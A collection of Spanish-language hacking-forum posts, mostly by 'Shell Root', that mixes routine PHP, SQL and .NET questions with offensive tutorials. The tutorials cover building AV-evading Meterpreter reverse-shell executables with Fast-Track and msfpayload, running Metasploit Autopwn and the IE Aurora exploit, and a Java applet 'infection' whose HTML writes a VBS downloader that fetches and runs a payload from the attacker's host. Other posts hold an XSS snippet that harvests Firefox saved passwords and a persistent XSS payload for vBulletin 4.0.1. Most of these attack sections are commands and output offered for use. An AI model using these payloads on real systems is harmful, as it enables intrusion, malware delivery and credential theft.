Miremos que nos dice el Scanner de NoVirusThanks:
CitarFile Info

Report date: 2010-04-08 07:14:17 (GMT 1)
File name: PoC_PDF_EXE.pdf
File size: 1698671 bytes
MD5 Hash: 23d92e4f9b132150d002d014eb772529
SHA1 Hash: 20f0caceffefa8958ffa7638657393ae2d34e3c1
Detection rate: 2 on 20 (10%)
Status: INFECTED

Detections

a-squared - -
Avast - JS:Pdfka-XN [Expl]
AVG - -
Avira AntiVir - -
BitDefender - Exploit.PDF-Dropper.Gen
ClamAV - -
Comodo - -
Dr.Web - -
Ewido - -
F-PROT6 - -
G-Data - -
Ikarus T3 - -
Kaspersky - -
McAfee - -
NOD32 - -
Panda - -
Solo - -
TrendMicro - -
VBA32 - -
Zoner - -

Scan report generated by NoVirusThanks.org

Fuente: http://shellrootsecurity.blogspot.com/2010/04/metasploit-incrustar-ejecutable-dentro.html
#205
TEST DE PENETRACIÓN

[S]ecurity [A]udit
By: Shell Root


DEFINICIÓN:Una prueba de penetración es un método de evaluación de la seguridad de un sistema informático o red mediante la simulación de un ataque malicioso, por parte de Black Hat Hacker o Cracker. El proceso implica un análisis activo del sistema de las vulnerabilidades potenciales que puedan resultar de una mala o inadecuada configuración del sistema. Este análisis se realiza desde la posición de un atacante potencial, y puede implicar la explotación activa de vulnerabilidades de seguridad.

Cualquier problema de seguridad que se encuentran se presentará al propietario de la red, junto con una evaluación de su impacto y a menudo con una propuesta de mitigación o una solución técnica.

Fuente: http://en.wikipedia.org/wiki/Penetration_test

CONTENIDO:





Banner's Identification          Target Enumeration          Scanning
Descripción           Descripción           Descripción
Herramientas           Herramientas           Herramientas
Método de uso           Método de uso           Método de uso
Sniffing & Spoofing          Brute force attacks          Vulnerability Scanning
Descripción           Descripción           Descripción
Herramientas           Herramientas           Herramientas
Método de uso           Método de uso           Método de uso
Denial of Service
Descripción
Herramientas
Método de uso

AUTOR:Shell Root
#206
Estoy desarrollando una pagina web, donde quiero ponerle algo asi como este muñeco...



Alguien sabe de algun software o un pack de renders, que contengan estos muñecos.
#207
Desarrollo Web / Script + phpmyadmin
25 Marzo 2010, 19:18 PM
Se podria crear una script, para crear una base de datos automaticamente dentro de phpmyadmin?
#208
Hacking / Manual del Meterpreter en Español!
25 Marzo 2010, 03:37 AM
#209
PHP / Expresiones Regulares + Php wtf!
24 Marzo 2010, 17:03 PM
Tengo una expresion regular, que al final tiene *sh, es decir:
([ExpresionRegular])*sh

Donde *: Coincide si el caracter sh, precede y esta presente.

Ahora quiero usarla en PHP, Así:
Código (php) [Seleccionar]
echo preg_replace("([ExpresionRegular])*sh","error",$strContenido);

Me genera este error:
Warning: preg_replace() [function.preg-replace]: Unknown modifier '*' in --------\index.php on line -







Edited:
Al parecer necesitaba escapar los caracteres, bueno, eso creo. Entonces quedo así:
/([ExpresionRegular])*sh/

Pero ahora el error es el siguiente:
Warning: preg_replace() [function.preg-replace]: Delimiter must not be alphanumeric or backslash in --------\index.php on line --
#210
Nivel Web / Pequeña duda con ReDoS!
19 Marzo 2010, 00:01 AM
Bueno, mirando el documento que dejo WHK (Que por cierto, hago sino soñar con él, pero nada de sueño gays! =P), sobre Regular Expression Denial of Service (Que raro en Expresion tengo la E en mayuscula y la muestra en minuscula, que raro.). Continuando con mi pregunta, no logro entender bien como seria la denegacion de servicio, para que el retorno de los datos, sea el valor no filtrado por la expresion regular!.

Alguien que tenga un ejemplo de como seria esa denegación de servicio?

Saludos!
#211
Robando claves por XSS del Administrador de Contraseñas del Firefox

Gracias a un mensaje de Tom Brennan, me entero de un problema en el Administrador de Contraseñas del Mozilla Firefox, que permite a un atacante mediante XSS (Cross-site scripting) obtener la clave de un usuario almacenada en el navegador.



El problema se encuentra en que el administrador de contraseñas del Mozilla Firefox , no valida adecuadamente el formulario desde el cual se guarda la clave en el administrador de contraseñas, por lo tanto si a la pagina donde se encuentra el formulario de logueo se le puede realizar un XSS es posible agregar un formulario con un campo oculto del tipo "password" y al acceder a ella, firefox no solo llenara el formulario real de acceso automáticamente, sino también el formulario oculto que acabamos de inyectar.



Si le echamos un vistoso al formulario utilizando el plugin Web Developer para el Mozilla Firefox, encontramos que efectivamente el Administrador de Contraseñas, nos llenó el formulario oculto que colocamos en la pagina mediante XSS con nuestra clave de acceso:



El código utilizado para robar la información del Administrador de contraseñas en el Mozilla Firefox:

Código (javascript) [Seleccionar]
<script>
   document.write('<form><input id=p type=password style=visibility:hidden></form>');
   setTimeout('alert("Password: " + document.getElementById("p").value)', 100);
</script>


Podemos modificar el formulario para que nos envié la contraseña capturada a un archivo en el que puede ser almacenada o enviada por correo electrónico, pero en esta prueba de concepto no lo realizaremos.

En este caso contar con "clave maestra" en el administrador de contraseñas del Mozilla Firefox no supone una "barrera" para que obtengan nuestras claves, ya que una vez ingresada la clave maestra, el Firefox llenara de todas formas el formulario con nuestra clave.

Aunque posiblemente una técnica similar pueda funcionar en otros navegadores, he realizado pruebas en Google Chrome, Safari y Opera siendo el Mozilla Firefox el único afectado.

PoC: http://www.oftedal.no/~erlend/test/

Fuente: :http://www.dragonjar.org/robando-claves-por-xss-del-administrador-de-contrasenas-del-firefox.xhtml
#212
Supongamos que tenemos esta función:
Código (php) [Seleccionar]
<?php
  
function replace_sh($strTexto){
    echo 
str_replace(">","[No]",str_replace("<","[No]",$strTexto));//Resultado
  
}//End Function
?>


Ingresaria algo como esto...
<h1>Shell Root</h1>

El resultado seria esto:
[No]h1[No]Shell Root[No]/h1[No]

Como Fuck, se puede bypassear esa función, es una duda que tengo desde hace raton, y le pregunte a Tomi, y no me entendio... xD
#213
XSS vBulletin 4.0.1

By: Shell Root



Dentro del archivo admincalendar.php de la linea 170 a la 192, se realiza una inserción a la base de datos.
Código (php) [Seleccionar]
$db->query_write("
INSERT INTO " . TABLE_PREFIX . "calendarcustomfield
(
calendarid,
title,
options,
allowentry,
required,
length,
description
)
VALUES
(" .
$vbulletin->GPC['calendarid'] .", '" .
$db->escape_string($vbulletin->GPC['title']) . "', '" .
$db->escape_string($vbulletin->GPC['options']) . "', " .
$vbulletin->GPC['allowentry'] . ", " .
$vbulletin->GPC['required'] . ", " .
$vbulletin->GPC['length'] . ", '" .
$db->escape_string($vbulletin->GPC['description']) . "'
)
");
}


Al mirar detenidamente, se vé la función escape_string y me pregunte y de hecho postee aquí, de que se trataba esa función, ya que no es una función propia del PHP. Me dí a la busqueda de dicha función y se encontraba dentro del archivo includes/class_core.php, desde la linea 717 hasta 727.
Código (php) [Seleccionar]
function escape_string($string)
{
if ($this->functions['escape_string'] == $this->functions['real_escape_string'])
{
return $this->functions['escape_string']($string, $this->connection_master);
}
else
{
return $this->functions['escape_string']($string);
}
}

Esta función lo que hace es evitar caracteres especiales dentro de una sentencia SQL (Como bien me lo dijo Nakp).

Ahora que pasa si no ingresamos caracteres especiales para afectar una sentencia SQL sino algo como esto <script>alert(/XSS/)</script>, os dejara pasar y se convertirá en un XSS Persistente!. Miremos...

Dentro del archivo admincalendar.php, tenemos la oportunidad de modificar un calendario y si miramos el codigo fuente, obtenemos esto: (Solo la parte que os interesa)
Código (php) [Seleccionar]
<input class="bginput" name="calendar[title]" id="it_calendar[title]_1" value="" size="35" dir="ltr" tabindex="1" type="text">

Podemos realizar esto para bypassear el input:
Código (php) [Seleccionar]
"><script>alert(/XSS/)</script>

A lo que al llamarlo quedará así, provocando un XSS Persistente:
Código (php) [Seleccionar]
<input class="bginput" name="calendar[title]" id="it_calendar[title]_1" value=""><script>alert(/XSS/)</script>" size="35" dir="ltr" tabindex="1" type="text">

NOTA: La Inserción del XSS dentro del archivo, es solo por un usuario Administrador
#214
Bueno, mirando el code de vBulletin 4.0.1, pude sacarle 2 XSS en menos de 10 min, tratando de mirar el code, me encuentro una función escape_string. Pero WTF! no creo que sea una funcion propia del PHP o si?
#215
xD, pasa algo muy raro, o soy muy idiota para ver el error! Tengo esta consulta!
Código (sql) [Seleccionar]
SELECT [intID], [intIDFormato]
 FROM [tblMaterial]
 WHERE (intIDFormato = 1) AND (bitEstado= 'True') -- Aqui son condiciones obligatorias
 AND (strTitulo LIKE '%') OR (intIDAutor = '') OR (intIDArea = '')


Al momento de ejecutarlo. Me trae registros de otro Formato! Why! si tengo en las primeras condiciones que el formato sea igual a 1? WTF!

Ejemplo:
Código (sql) [Seleccionar]
SELECT [intID], [intIDFormato]
 FROM [tblMaterial]
 WHERE (intIDFormato = 1) AND (bitEstado= 'True') -- Aqui son condiciones obligatorias
 AND (strTitulo LIKE '%') OR (intIDAutor = '1') OR (intIDArea = '')

El resultado es:

intID intIDFormato
2 4

WTF!
#216
Tengo este cursor, el cual debe de devolver como resultado lo siguiente
2
10


Pero me devuelve
10
10


El codigo es esté
Código (sql) [Seleccionar]

--Variables de recepcion de datos
DECLARE @intIDSanciones INT

--Declaración del Cursor
DECLARE curSanciones CURSOR FOR SELECT intID FROM dbo.tblSanciones WHERE (bitEstado = 'True') AND (dateFechaLimite = CONVERT(VARCHAR(10),DATEADD(DAY,-1,GETDATE()),101))
OPEN curSanciones

FETCH NEXT FROM curSanciones INTO @intIDSanciones

WHILE (@@FETCH_STATUS = 0)
BEGIN
FETCH NEXT FROM curSanciones INTO @intIDSanciones
BEGIN TRANSACTION Acciones
-- Mostrar Sanciones
PRINT @intIDSanciones
-- Fin Mostrar Sanciones
COMMIT TRANSACTION Acciones
END
CLOSE curSanciones
DEALLOCATE curSanciones






Solucionado
Código (sql) [Seleccionar]
--Variables de recepcion de datos
DECLARE @intIDSanciones INT

--Declaración del Cursor
DECLARE curSanciones CURSOR FOR SELECT intID FROM tblSanciones WHERE (bitEstado = 'True') AND (dateFechaLimite = CONVERT(VARCHAR(10),DATEADD(DAY,-1,GETDATE()),101))
OPEN curSanciones

FETCH NEXT FROM curSanciones INTO @intIDSanciones

WHILE (@@FETCH_STATUS = 0)
BEGIN
--BEGIN TRANSACTION Acciones
-- Mostrar Sanciones
SELECT @intIDSanciones
FETCH NEXT FROM curSanciones INTO @intIDSanciones
-- Fin Mostrar Sanciones
--COMMIT TRANSACTION Acciones
END
CLOSE curSanciones
DEALLOCATE curSanciones
#217
Bases de Datos / Datos del Sistema con MySQL
28 Febrero 2010, 01:05 AM
Bueno, estuve pensando y quiero realizar algo, que será un secreto hasta la muerte, pero quiero saber si es posible saber donde esta ubicado la carpeta del phpmyadmin, es decir, donde esta instalado esa carpetá, ya que desde allí, miro las bases de datos que existen. Algunas consulta SQL, para saber donde esta situada la base de datos o la carpeta del phpmyadmin
#218
Bases de Datos / Recuperar valor de consulta SQL
27 Febrero 2010, 06:29 AM
Bueno, en vista de que retome mi profesion de Desarrollador de Software, cosa que no retomaba desde hace más de 4 ó 5 meses, se me olvido realizar esto en SQL.

Supongamos que tenemos esta consulta.
Código (sql) [Seleccionar]
SELECT COUNT(intIDUsuario) FROM dbo.tblReservas WHERE (intIDUsuario = '1') AND (Estado = 'Activo')

Ahora quiero que en una variable dentro del SQL, recuperar el valor que dá el resultado de la consulta anterior. Tengo que usar Cursores?
#219
Bueno, tengo una pregunta, que hace rato me anda rondando en la cabeza. Miren, supongamos que tenemos una consulta así:
Código (sql) [Seleccionar]
SELECT [strIdentificacion], [strNombre], [strApellido]
 FROM [Knowledge].[dbo].[tblUsuario]


Ahora cuales son las posibles opciones para ejecutar y recuperar el resultado de la consulta dentro de Aspx.NET

Opción 1:
Código (vbnet) [Seleccionar]
strCmd = New SqlCommand(strSql, strcnn)

strDr = strCmd.ExecuteReader
If strSqlDataReader.Read Then
  txtIdentificacion.Text = strSqlDataReader("strIdentificacion").ToString()
  txtNombre.Text = strSqlDataReader("strNombre").ToString()
  txtApellido.Text = strSqlDataReader("strApellido").ToString()
End If
#220
Introducing .NET 4.0 With Visual Studio 2010


Author: Alex Mackey / Published: Feb 2010 / Size: 15.05MB

Download: http://d3.myfreefilehosting.com/d1/Apress.Introducing.dot.NET.4.0.with.Visual.Studio.2010.Feb.2010.pdf

#221
[Fast-Track + Metasploit] PAYLOAD Automatically Generate
[Metasploit By: Shell Root]



Como alguna vez miramos en esté Articulo [Metasploit] Generando Ejecutable con PAYLOAD (http://foro.elhacker.net/hacking_avanzado/metasploit_generando_ejecutable_con_payload-t279407.0.html), en este caso, lo haremos de forma mucho más automatizada con el Script Fast-Track.py

Ingresamos a la carpeta donde se encuentra el archivo Fast-Track.py y lo ejecutamos. Seleccionamos el modo -c (Command Line Mode)
shellroot@shellroot-desktop:~/fasttrack$ sudo python ./fast-track.py -c

************************************************************************
Fast-Track Command Line - Where it's OK to finish in under 3 minutes...
************************************************************************

**** MAKE SURE YOU INSTALL ALL THE DEPENDENCIES FIRST  (setup.py) ****

Visit http://trac.thepentest.com for tutorials or to file a bug.

1. Update Menu
2. Autopwn Automated
3. MS-SQL Injector
4. MS-SQL Bruter
5. Binary to Hex Payload Generator
6. Mass Client-Side Attack
7. Exploits
8. SQLPwnage
9. Payload Generator
10. Changelog
11. Credits
12. About

Usage: fast-track.py -c <tool#>

shellroot@shellroot-desktop:~/fasttrack$


Ahora seleccionamos el item 9. Payload Generator
shellroot@shellroot-desktop:~/fasttrack$ sudo python ./fast-track.py -c 9

#####################################
###                               ###
### Metasploit Payload Generator  ###
###                               ###
### Written by: Dave Kennedy      ###
### aka ReL1K                     ###
###                               ###
#####################################
#####################################


The Metasploit Payload Generator is a simple tool to
make it extremely easy to generate a payload and listener
on the Metasploit framework. This does not actually
exploit any systems, it will generate a metasploit payload
for you and save it to an executable. You then need to
someone get it on the remote server by yourself and get it
to execute correctly.

This will also encode your payload to get past most AV and
IDS/IPS.


Despues seleccionamos el PAYLOAD que queramos, en este caso usaré el 2. Windows Reverse_TCP Meterpreter
What payload do you want to generate:

Name:                                Description:

1. Windows Shell Reverse_TCP               Spawn a command shell on victim and send back to attacker.
2. Windows Reverse_TCP Meterpreter         Spawn a meterpreter shell on victim and send back to attacker.
3. Windows Reverse_TCP VNC DLL             Spawn a VNC server on victim and send back to attacker.
4. Windows Bind Shell                      Execute payload and create an accepting port on remote system.

Enter choice (example 1-6): 2


Despues seleccionaremos el encoder a usar, recordad que los encoders son para un posible bypasseo de antivirus (Proximo Tutorial "Bypassear Antivirus con MSF"). Seleccionamos 2. shikata_ga_nai
Below is a list of encodings to try and bypass AV.

Select one of the below, Avoid_UTF8_tolower usually gets past them.

1. avoid_utf8_tolower
2. shikata_ga_nai
3. alpha_mixed
4. alpha_upper
5. call4_dword_xor
6. countdown
7. fnstenv_mov
8. jmp_call_additive
9. nonalpha
10. nonupper
11. unicode_mixed
12. unicode_upper
13. alpha2
14. No Encoding

Enter your choice : 2


Despues nos pedira el LHOST, digitamos la Dirección IP a la cual queremos que reciba la sessión del Meterpreter.
Enter IP Address of the listener/attacker (reverse) or host/victim (bind shell): 192.168.142.137

Despues nos pedira el LPORT, digitamos el puerto para poner a la escucha.
Enter the port of the Listener: 1234

Ahora nos da la opcion a elegir entre una ShellCode o un Archivo ejecutable. Seleccionaré 1. Executable
Do you want to create an EXE or Shellcode

1. Executable
2. Shellcode

Enter your choice: 1

A payload has been created in this directory and is named 'payload.exe'. Enjoy!


Yá hemos creado un Archivo Ejecutable con un PAYLOAD, ademas de esta automatización, tambien podemos Automatizar el Auxiliary Multi/Handler. Así que digitamos Yes.
Do you want to start a listener to receive the payload yes or no: yes

Launching Listener...
***********************************************************************************************

Launching MSFCLI on 'exploit/multi/handler' with PAYLOAD='windows/meterpreter/reverse_tcp'
Listening on IP: 192.168.142.137 on Local Port: 1234 Using encoding: ENCODING=shikata_ga_nai

***********************************************************************************************
[*] Please wait while we load the module tree...
[*] Starting the payload handler...
[*] Started reverse handler on port 1234


Como podemos, inicia automaticamente el multi/handler, ademas los parametros que insertamos anteriormente (LHOST, LPORT, Encode), ahora solo esperamos a que la victima ejecute el Archivo Ejecutable, para recibir la session del Meterpreter.

By: Shell Root

Gr3tz: Rcart, Trashhgoo, Messerschmitt, Xzite.
CPH, elhacker.net, DDLR.
#222
[Fast-Track + Metasploit] Autopwn Automation
[Metasploit] By: Shell Root


Fast-Track es un proyecto basado en Python de código abierto destinado a ayudar a los Pent-Test en un esfuerzo por identificar, explotar y además penetrar en una red.

Fast-Track utiliza una gran parte de la Metasploit Framework para terminar los ataques con éxito. Fast Track tiene una amplia variedad de ataques únicos que le permiten utilizar el marco de Metasploit a su máximo potencial.

Como alguna vez miramos en estos 2 Articulos.

Al momento de escanear y obtener resultados contundentes con el Scanner Nessus And/Or Nmap, podremos hacer uso del Comando Autopwn, ahora que es lo que hace Autopwn Automation? Esto lo que hace es automatizar todos los pasos anteriores con tan solo poner la IP. Parece un poco Lammer, pero es una gran opción, al momento de realizar varios Test de Penetración en diferentes sistemas computacionales. Miremos.

Ejecutamos el Script Fast-Track.py y damos como parametros el modo para interactuar. Recordad:

  • -c (Command Line Mode)
  • -g (Web GUI Mode)
shellroot@shellroot-desktop:~/fasttrack$ sudo python ./fast-track.py
[sudo] password for shellroot:
Psyco not detected....Recommend installing it for increased speeds.

----------------------------------------------------------------

Fast-Track v4.0 - Where it's OK to finish in under 3 minutes...

Automated Penetration Testing

Written by David Kennedy (ReL1K)
SecureState
http://www.securestate.com
dkennedy@securestate.com

Wiki and Bug Track: http://www.thepentest.com

Please read the README and LICENSE before using
this tool for acceptable use and modifications.

----------------------------------------------------------------
Modes:

Interactive Menu Driven Mode: -i
Command Line Mode: -c
Web GUI Mode -g

Examples: ./fast-track.py -i
          ./fast-track.py -c
          ./fast-track.py -g
          ./fast-track.py -g <portnum>

Usage: ./fast-track.py <mode>

shellroot@shellroot-desktop:~/fasttrack$ sudo python ./fast-track.py -c
Psyco not detected....Recommend installing it for increased speeds.

----------------------------------------------------------------

Fast-Track v4.0 - Where it's OK to finish in under 3 minutes...

Automated Penetration Testing

Written by David Kennedy (ReL1K)
SecureState
http://www.securestate.com
dkennedy@securestate.com

Wiki and Bug Track: http://www.thepentest.com

Please read the README and LICENSE before using
this tool for acceptable use and modifications.

----------------------------------------------------------------
Modes:

Interactive Menu Driven Mode: -i
Command Line Mode: -c
Web GUI Mode -g

Examples: ./fast-track.py -i
          ./fast-track.py -c
          ./fast-track.py -g
          ./fast-track.py -g <portnum>

Usage: ./fast-track.py <mode>


************************************************************************
Fast-Track Command Line - Where it's OK to finish in under 3 minutes...
************************************************************************

**** MAKE SURE YOU INSTALL ALL THE DEPENDENCIES FIRST  (setup.py) ****

Visit http://trac.thepentest.com for tutorials or to file a bug.

1. Update Menu
2. Autopwn Automated
3. MS-SQL Injector
4. MS-SQL Bruter
5. Binary to Hex Payload Generator
6. Mass Client-Side Attack
7. Exploits
8. SQLPwnage
9. Payload Generator
10. Changelog
11. Credits
12. About

Usage: fast-track.py -c <tool#>

shellroot@shellroot-desktop:~/fasttrack$


Seleccionamos el item Autopwn Automation
shellroot@shellroot-desktop:~/fasttrack$ sudo python ./fast-track.py -c 2

Metasploit Autopwn Automated

Metasploit's Autopwn Function can require some knowledge in order
to set it up. Fast-Track tries to simplify that.

Simply type ./fast-track -c 2 <ipaddr or range> <-r or -b> (reverse or bind) to launch the exploits.

Usage: ./fast-track.py -c 2 <iprange> <-r or -b> <--reverse or bind

Examples: ./fast-track.py -c 2 192.168.1.1-254 -b
          ./fast-track.py -c 2 "-PN 192.168.1.1-254" -r
          ./fast-track.py -c 2 "-T 1 192.168.1.1/24" -r


shellroot@shellroot-desktop:~/fasttrack$


Miramos y Asignamos parametros son necesarios para correr el Exploit Automatizado.
shellroot@shellroot-desktop:~/fasttrack$ sudo python ./fast-track.py -c 2 192.168.0.2 -r

Se creará una "Base de Datos", de nombre Pentest, y se ejecutará el Nmap con el Parametro IP o Rango Asignado. Ahora hará uso del comando Autopwn y esperametros a que termine de verificar los Exploit que pueden ser ejecutados por las vulnerabilidades encontradas en el sistema. Por ultimo esperaremos que nos entregue las sessiones el Meterpreter.

By: Shell Root
#223
Que tal, ando con una duda al crear una aplicacion, que lo unico que hace es comparar imagenes. Basicamente hace lo siguiente:

En 2 PictureBox tener la posibilidad de poner 2 Imagenes, al darle click en un Button, diga, Si son Iguales o no, y si se puede que diga por cuanto % es igual a la otra imagen.

Alguna pista de como crealo?
#224
[Metasploit + 0-day IE] Exploit IE_Aurora




Descargad el Exploit IE_Aurora.rb de http://www.metasploit.com/redmine/projects/framework/repository/revisions/8136/entry/modules/exploits/windows/browser/ie_aurora.rb. Ponemos el Exploit dentro de la carpeta que nos de la gana, yo la puse en Windows/Browser/Ie_Aurora. Ingresamos a la Consola del Metasploit y cargamos el Exploit Ie_Aurora

                                 _       _
            _                   | |     (_)_
____   ____| |_  ____  ___ ____ | | ___  _| |_
|    \ / _  )  _)/ _  |/___)  _ \| |/ _ \| |  _)
| | | ( (/ /| |_( ( | |___ | | | | | |_| | | |__
|_|_|_|\____)\___)_||_(___/| ||_/|_|\___/|_|\___)
                          |_|


      =[ metasploit v3.3.3-release [core:3.3 api:1.0]
+ -- --=[ 481 exploits - 220 auxiliary
+ -- --=[ 192 payloads - 22 encoders - 8 nops
      =[ svn r7957 updated 27 days ago (2009.12.23)

Warning: This copy of the Metasploit Framework was last updated 27 days ago.
        We recommend that you update the framework at least every other day.
        For information on updating your copy of Metasploit, please see:
            http://dev.metasploit.com/redmine/projects/framework/wiki/Updating

msf > use windows/browser/ie_aurora
msf exploit(ie_aurora) >


Miramos que opciones tiene y cuales son requeridos
msf exploit(ie_aurora) > show options

Module options:

  Name        Current Setting  Required  Description
  ----        ---------------  --------  -----------
  SRVHOST     0.0.0.0          yes       The local host to listen on.
  SRVPORT     8080             yes       The local port to listen on.
  SSL         false            no        Negotiate SSL for incoming connections
  SSLVersion  SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
  URIPATH                      no        The URI to use for this exploit (default is random)


Exploit target:

  Id  Name
  --  ----
  0   Automatic


msf exploit(ie_aurora) >


Llenamos los parametros de SRVHOST, URIPATH y Seleccionamos el PAYLOAD.
msf exploit(ie_aurora) > set SRVHOST 192.168.0.2
SRVHOST => 192.168.0.2
msf exploit(ie_aurora) > set URIPATH /
URIPATH => /
msf exploit(ie_aurora) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf exploit(ie_aurora) >


Lanzamos el Exploit y esperamos a que la victima ingrese a la URL.
msf exploit(ie_aurora) > exploit
[*] Exploit running as background job.
msf exploit(ie_aurora) >
[*] Started bind handler
[*] Using URL: http://192.168.0.2:8080/
[*] Server started.


Video:
[youtube=425,350]http://www.youtube.com/watch?v=4o8UPTEU_Uo[/youtube]

Se debe a: a que cuando un usuario carga manualmente un sitio Web, código ‭‬javascript especialmente conformado provoca una corrupción de memoria que en última instancia permite el acceso al sistema. Esta vulnerabilidad es extremadamente crítica, y el código lleva circulando libremente por Internet desde hace un par de días, lo que hace más que posible que el exploit, que en principio se diseñó para el robo de propiedad intelectual en un ataque segmentado contra grandes corporaciones, pueda estar explotándose de un modo más generalista.

Fuente: http://www.sahw.com/wp/archivos/2010/01/16/sobre-la-ultima-vulnerabilidad-de-internet-explorer-consejos-practicos-para-usuarios/
#225
Hacking / [Metasploit] Java Applet Infection
19 Enero 2010, 02:48 AM
[Metasploit] Java Applet Infection


[Metasploit By: trashhgoo & Shell Root]



Está infeccion permite la ejecución de codigo remoto, por medio del navegador. Para lograr nuestro objetivo, necesitamos tener instalado dentro de nuestro P.C, algunos componentes necesarios para la compilación y ejecución de alguns archivos.

Primero instalaremos el JDK de JAVA para la compilacion del codigo en JAVA para la ejecución del codigo remoto.
shellroot@ShellRoot-desktop:~$ sudo apt-get install sun-java6-jdk

Tambien es necesario la instalacion del Apache2
shellroot@ShellRoot-desktop:~$ sudo apt-get install apache2

Ahora para que nos quede organizado y no, se nos pierdan archivos, crearemos una carpeta dentro de la carpeta personal. (/home/shellroot/)
shellroot@ShellRoot-desktop:~$ mkdir JavaAppletInfect

Nos movemos a la carpeta que acabamos de crear y bajamos el siguiente archivo http://spl0it.org/files/makeapplet.sh, no sin antes guardar el siguiente codigo como MSFcmd.java
Código (java) [Seleccionar]
import java.applet.*;
import java.awt.*;
import java.io.*;

public class MSFcmd extends Applet {
  public void init() {
     Process f;
     String first = getParameter("first");
     
     Try {
        f = Runtime.getRuntime().exec("first");
     }Catch(IOException e) {
        e.printStackTrace();
     }
     Process s;
  }
}


Ahora estamos listos para descargar y ejecutar el archivo makeapplet.sh. Así:
shellroot@shellroot-desktop:~/JavaAppletInfect$ wget http://spl0it.org/files/makeapplet.sh && chmod a+x ./makeapplet.sh
--2010-01-18 20:07:25--  http://spl0it.org/files/makeapplet.sh
Resolviendo spl0it.org... 205.138.55.249
Conectando a spl0it.org|205.138.55.249|:80... conectado.
Petición HTTP enviada, esperando respuesta... 200 OK
Longitud: 2184 (2,1K) [application/x-sh]
Guardando: «makeapplet.sh»

100%[======================================>] 2.184       --.-K/s   en 0,02s  

2010-01-18 20:07:26 (99,9 KB/s) - `makeapplet.sh' guardado [2184/2184]

shellroot@shellroot-desktop:~/JavaAppletInfect$ ./makeapplet.sh


Despues de ello, nos perdia una información para configurar nuestro certificado. Llenamos la informacion como queramos y al finalizar correctamente, se crearán los certificados del Script.
Enter the name of the applet without the extension:
MSFcmd
[+] Packaging the compiled class into a JAR file
[+] Generating key pairs
¿Cuáles son su nombre y su apellido?
 [Unknown]:  MSFcmd
¿Cuál es el nombre de su unidad de organización?
 [Unknown]:  Microsoft
¿Cuál es el nombre de su organización?
 [Unknown]:  Microsoft Organization
¿Cuál es el nombre de su ciudad o localidad?
 [Unknown]:  Medellin
¿Cuál es el nombre de su estado o provincia?
 [Unknown]:  Colombia
¿Cuál es el código de país de dos letras de la unidad?
 [Unknown]:  CO
¿Es correcto CN=MSFcmd, OU=Microsoft, O=Microsoft Organization, L=Medellin, ST=Colombia, C=CO?
 [no]:  si

[+] Signing the JAR file

Warning:
The signer certificate will expire within six months.
[+] Exporting the public key certificate
Certificado almacenado en el archivo <mycertificate.cer>
[+] Done


Deploy the JAR and certificate files. They should be deployed to a distribution directory on a Web server.

<applet width='1' height='1' code=MSFcmd.class archive=SignedMSFcmd.jar> </applet>

shellroot@shellroot-desktop:~


Ahora tenemos que copiar los archivos SignedMSFcmd.Jar y MSFcmd.Class dentro de la carpeta /var/www, despues de ello, iniciamos el Serividor Apache. Así:
shellroot@shellroot-desktop:~/JavaAppletInfect$ sudo cp SignedMSFcmd.jar /var/www
shellroot@shellroot-desktop:~/JavaAppletInfect$ sudo cp MSFcmd.class /var/wwwshellroot@shellroot-desktop:~/JavaAppletInfect$ aparche2ctl start
No command 'aparche2ctl' found, did you mean:
Command 'apache2ctl' from package 'apache2.2-common' (main)
aparche2ctl: command not found
shellroot@shellroot-desktop:~/JavaAppletInfect$ apache2ctl start
apache2: Could not reliably determine the server's fully qualified domain name, using 127.0.1.1 for ServerName
(13)Permission denied: make_sock: could not bind to address [::]:80
(13)Permission denied: make_sock: could not bind to address 0.0.0.0:80
no listening sockets available, shutting down
Unable to open logs
shellroot@shellroot-desktop:~/JavaAppletInfect$


Despues de realizar todo lo anterior, precedemos a realizar un ejecutable con un PAYLOAD en este caso usaré windows/meterpreter/reverse_tcp
shellroot@shellroot-desktop:~$ cd msf3
shellroot@shellroot-desktop:~/msf3$ ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.142.136 LPORT=1234 R | ./msfencode -t exe -o MSFcmd.exe
[*] x86/shikata_ga_nai succeeded with size 318 (iteration=1)

shellroot@shellroot-desktop:~/msf3$


Movemos el ejecutable dentro de la carpeta /var/www y configuramos los permisos del archivo.
shellroot@shellroot-desktop:~/msf3$ sudo cp ./MSFcmd.exe /var/www/
shellroot@shellroot-desktop:~/msf3$ sudo chmod a+x /var/www/MSFcmd.exe
shellroot@shellroot-desktop:~/msf3$


Ahora el archivo (index.html) que se encuentra dentro de la carpeta /var/www, modificamos el contenido y le añadimos el Script Malicioso. Así:
Código (html) [Seleccionar]
<html>
<head><title></title></head>
<body>
  <applet width='1' height='1' code='MSFcmd.class' archive='SignedMSFcmd.jar'>

  <param name='first' value='cmd.exe /c echo Const adTypeBinary = 1 > C:\windows\apsou.vbs & echo Const adSaveCreateOverWrite = 2 >> C:\windows\apsou.vbs & echo Dim BinaryStream >> C:\windows\apsou.vbs & echo Set BinaryStream = CreateObject("ADODB.Stream") >> C:\windows\apsou.vbs & echo BinaryStream.Type = adTypeBinary >> C:\windows\apsou.vbs & echo BinaryStream.Open >> C:\windows\apsou.vbs & echo BinaryStream.Write BinaryGetURL(Wscript.Arguments(0)) >> C:\windows\apsou.vbs & echo BinaryStream.SaveToFile Wscript.Arguments(1), adSaveCreateOverWrite >> C:\windows\apsou.vbs & echo Function BinaryGetURL(URL) >> C:\windows\apsou.vbs & echo Dim Http >> C:\windows\apsou.vbs & echo Set Http = CreateObject("WinHttp.WinHttpRequest.5.1") >> C:\windows\apsou.vbs & echo Http.Open "GET", URL, False >> C:\windows\apsou.vbs & echo Http.Send >> C: windows\apsou.vbs & echo BinaryGetURL = Http.ResponseBody >> C:\windows\apsou.vbs & echo End Function >> C:\windows\apsou.vbs & echo Set shell = CreateObject("WScript.Shell") >> C:\windows\apsou.vbs & echo shell.Run "C:\windows\MSFcmd.exe" >> C:\windows\apsou.vbs & start C:\windows\apsou.vbs http://192.168.142.136/MSFcmd.exe C:\windows\MSFcmd.exe'> </applet>
</body>
</html>


Ahora ingresamos a la Consola del Metasploit, y usamos el Auxiliar multi/handler, ingresamos los datos del PAYLOAD anterior con los mismo datos, y ejecutamos el exploit en segundo plano. Así:
shellroot@shellroot-desktop:~/msf3$ ./msfconsole

                o                       8         o   o
                8                       8             8
ooYoYo. .oPYo.  o8P .oPYo. .oPYo. .oPYo. 8 .oPYo. o8  o8P
